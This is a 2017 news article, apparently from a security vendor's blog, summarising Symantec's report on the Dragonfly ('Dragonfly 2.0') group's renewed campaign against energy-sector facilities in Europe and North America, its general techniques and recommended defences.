September 7, 2017 By Mark Samuels 2 min read

A group of cybercriminals is targeting energy facilities in Europe and North America as part of a fresh wave of cybersecurity attacks that could lead to the disruption or sabotage of operational systems.

Though the group — called “Dragonfly” — has been at work since 2011, it became quiet after its operations were exposed by researchers in 2014. However, a new report by security specialist Symantec suggested the group has been active again since 2015 and has increased its operations through 2017.

The report presented more evidence of the threat facing executives who run critical infrastructure, such as energy facilities. IT managers in these organizations should take note of the risks highlighted by Symantec and look to reduce the threat through security best practices.

What Is Dragonfly?

According to SecurityWeek, the Dragonfly group is also known as Energetic Bear, Crouching Yeti and Iron Liberty. During its two-year lull, the group did not stop operations and instead worked to update its activities, according to Bleeping Computer.

In a blog post detailing its new analysis, Symantec suggested the group now aims to sabotage or gain control of operational systems in energy facilities. The researchers noted a distinct increase in activity through 2017 and suggested Dragonfly launched attacks in the U.S., Turkey and Switzerland. Symanetc also detected signs of action outside these nations.

Dissecting Dragonfly’s Techniques

The first activity of the renewed campaign, referred to as “Dragonfly 2.0,” came in the form of a malicious email campaign to the energy sector through December 2015. According to Symanetc, Dragonfly 2.0 relies on a range of other attack vectors, including watering hole attacks used to harvest network credentials and Trojanized software.

The attackers often use widely available malware via administration tools such as PowerShell, PsExec and BITSAdmin. Symantec suggested this use of standard malware might be part of a strategy to mask the group’s identity. The attackers typically install backdoors onto a victim’s computer to provide remote access to systems.

Researchers suggested the most concerning evidence centers on screen captures. Some of these captures included sensitive details such as the location of the infected machine and the name of the host organization. Many of these descriptions included the string cntrl, which is a potential indication that these machines have operational system access.

Symantec reported the amount of conflicting evidence about Dragonfly activities makes it difficult to state the origins of the group and the individuals involved. However, the firm referred to Dragonfly as a highly experienced threat actor with the capability to materially disrupt utility organizations. The long-term plans of the group remain uncertain.

Protecting the Energy Sector From Cybersecurity Attacks

An increasing number of experts recognize that energy and utilities organizations worldwide are focusing on cybersecurity attacks. The FBI and Department of Homeland Security issued a joint report earlier this year warning about the risk to nuclear power stations and other energy facilities, The New York Times reported.

Last month, the National Infrastructure Advisory Council (NIAC) published a draft report detailing the complex risks associated with critical infrastructure sectors. NIAC made 11 specific recommendations, including the establishment of specific network paths and reserved spectrum for backup communications during emergencies.

News of this ever-increasing threat represents a significant warning signal to executives running utility facilities and other elements of critical infrastructure. The Symantec researchers ended their report with several security recommendations, such as using strong passwords, implementing multiple protection systems and establishing an enforceable security policy with an emphasis on employee education programs.

More from

Government cybersecurity in 2025: Former Principal Deputy National Cyber Director weighs in

4 min read - As 2024 comes to an end, it’s time to look ahead to the state of public cybersecurity in 2025.The good news is this: Cybersecurity will be an ongoing concern for the government regardless of the party in power, as many current cybersecurity initiatives are bipartisan. But what will government cybersecurity look like in 2025?Will the country be better off than they are today? What are the positive signs that could signal a good year for national cybersecurity? And what threats should…

FYSA – Adobe Cold Fusion Path Traversal Vulnerability

2 min read - Summary Adobe has released a security bulletin (APSB24-107) addressing an arbitrary file system read vulnerability in ColdFusion, a web application server. The vulnerability, identified as CVE-2024-53961, can be exploited to read arbitrary files on the system, potentially leading to unauthorized access and data exposure. Threat Topography Threat Type: Arbitrary File System Read Industries Impacted: Technology, Software, and Web Development Geolocation: Global Environment Impact: Web servers running ColdFusion 2021 and 2023 are vulnerable Overview X-Force Incident Command is monitoring the disclosure…

2024 trends: Were they accurate?

4 min read - The new year always kicks off with a flood of prediction articles; then, 12 months later, our newsfeed is filled with wrap-up articles. But we are often left to wonder if experts got it right in January about how the year would unfold. As we close out 2024, let’s take a moment to go back and see if the crystal balls were working about how the year would play out in cybersecurity.Here are five trends that were often predicted for…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today